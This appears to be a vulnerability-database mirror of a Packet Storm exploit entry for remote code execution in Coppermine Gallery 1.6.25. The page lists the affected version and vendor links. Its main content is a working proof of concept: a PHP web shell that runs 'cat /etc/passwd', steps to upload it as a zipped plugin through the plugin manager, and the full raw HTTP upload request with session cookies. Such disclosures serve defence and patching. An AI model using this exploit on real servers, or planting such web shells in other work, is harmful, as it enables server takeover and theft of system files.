Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMirabbas AgalarovPACKETSTORM:175012
HistoryOct 10, 2023 - 12:00 a.m.

Coppermine Gallery 1.6.25 Remote Code Execution

2023-10-1000:00:00
Mirabbas Agalarov
packetstormsecurity.com
155
coppermine gallery
version 1.6.25
rce
php
linux
exploit
remote code execution
vendor url
github
mirabbas ağalarov
tested on
poc
php file
zip file
plugin manager
http request
host
content-length
user-agent
cookie
remote code execution
JSON
`Exploit Title: coppermine-gallery 1.6.25 RCE  
Application: coppermine-gallery  
Version: v1.6.25   
Bugs: RCE  
Technology: PHP  
Vendor URL: https://coppermine-gallery.net/  
Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip  
Date of found: 05.09.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
2. Technical Details & POC  
========================================  
steps  
  
  
1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.  
$ cat >> test.php   
<?php echo system('cat /etc/passwd'); ?>  
$ zip test.zip test.php  
  
1. Login to account  
2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php  
3. Upload zip file  
4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php  
  
  
  
poc request  
  
POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1  
Host: localhost  
Content-Length: 630  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c  
Connection: close  
  
------WebKitFormBoundaryi1AopwPnBYPdzorF  
Content-Disposition: form-data; name="plugin"; filename="test.zip"  
Content-Type: application/zip  
  
PK  
�����™b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>  
PK  
�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����  
------WebKitFormBoundaryi1AopwPnBYPdzorF  
Content-Disposition: form-data; name="form_token"  
  
50982f2e64a7bfa63dbd912a7fdb4e1e  
------WebKitFormBoundaryi1AopwPnBYPdzorF  
Content-Disposition: form-data; name="timestamp"  
  
1693905214  
------WebKitFormBoundaryi1AopwPnBYPdzorF--  
`
JSON